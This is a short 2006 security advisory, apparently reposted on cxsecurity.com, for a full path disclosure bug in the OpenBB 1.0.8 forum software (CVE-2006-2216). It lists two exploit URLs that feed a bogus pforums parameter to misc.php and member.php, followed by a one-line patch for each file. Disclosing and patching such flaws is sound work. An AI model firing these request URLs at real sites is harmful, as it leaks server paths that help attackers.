Bug: OpenBB 1.0.8 Full Path Disclosure ( Ascii Version )

Search:
WLB2

OpenBB 1.0.8 Full Path Disclosure

Published
Credit
Risk
2006.05.08
Devil-00
Low
CWE
CVE
Local
Remote
N/A
CVE-2006-2216
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
5/10
2.9/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
None
None

OpenBB 1.0.8 Full Path Disclosure

Bug Found By :- Devil-00

Gr33tz :- Www.securitygurus.neT

Rock Master

Hackers Pal

n0m3rcy

-= 1-2 =-

Full Path Disclosure

Exploits :-

/OpenBB/misc.php?action=latest&pforums=D3vil-0x1

/OpenBB/member.php?action=online&&pforums=D3vil-0x1

Fix It :-

misc.php

Add This Line To '36' Line Number

[code]

$pforums = array(); # D3vil-0x1 Fix

[/code]

-------------------------------------

member.php

Add This Line To '759' Line Number

[code]

$pforums = array(); # D3vil-0x1 Fix

[/code]

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version